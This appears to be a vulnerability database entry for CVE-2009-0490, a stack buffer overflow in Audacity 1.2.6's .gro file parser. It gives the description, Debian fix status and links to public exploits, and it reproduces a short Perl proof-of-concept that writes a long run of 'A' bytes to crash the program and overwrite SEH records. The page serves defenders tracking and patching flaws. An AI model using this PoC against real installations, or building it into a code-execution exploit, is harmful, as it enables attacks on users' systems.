CVE-2009-0490

VIR risk: 1.0

Description

Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.

Predictions

Exploit likelihood: 20%
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-7634 · dos · windows · verified · text · 1 KB
Houssamix · 2009-01-01

Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)

Source: Exploit-DB
# -----------------------------------------------------------
#  Author : Houssamix
# -----------------------------------------------------------

# Audacity 1.2.6 (.gro file) Local buffer overflow POC

# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.

# Description:
# When we select Project > Import MIDI... and import a ".gro" file containing a long run of characters,
# the program crashes and the following register state is observed:

# EAX:05050504  ECX:01414141  EDX:01520608  EBX:0012F154
# ESP:0012EF10  EBP:00000000  ESI:41414141  EDI:00000000
# EIP:006AEC54 audacity.006AEC54

# Access violation when reading [41414141]
# The pointer to the next SEH record and the SE handler are also overwritten.

# Poc  :
# --------------------------------------------------------

#!/usr/bin/perl
# [*] Bug : Audacity 1.2.6 (.gro file) Local buffer overflow
use warnings;
use strict;

my $chars = "\x41" x 2000;    # 2000 'A' bytes, longer than the parser's stack buffer
my $file  = "hsmx.gro";

# Open for writing (">" rather than ">>") so re-running the script
# recreates the file instead of appending to an existing one.
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
binmode($FILE);               # write raw bytes, no newline translation
print $FILE $chars;
close($FILE);
print "$file has been created. Import it in Audacity (Project > Import MIDI...)\n";

# ----------------------------------------------------------

# milw0rm.com [2009-01-01]
EDB-9501 · local · windows · verified
mr_me · 2009-08-24

Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)

EDB-10322 · local · windows · verified
Encrypt3d.M!nd · 2009-12-05

Audacity 1.2.6 - '.gro' Local Buffer Overflow


OS impact

Debian: fixed in 5 releases

Release    Status   Fixed in
trixie     Fixed    1.3.6-1
sid        Fixed    1.3.6-1
forky      Fixed    1.3.6-1
bullseye   Fixed    1.3.6-1
bookworm   Fixed    1.3.6-1
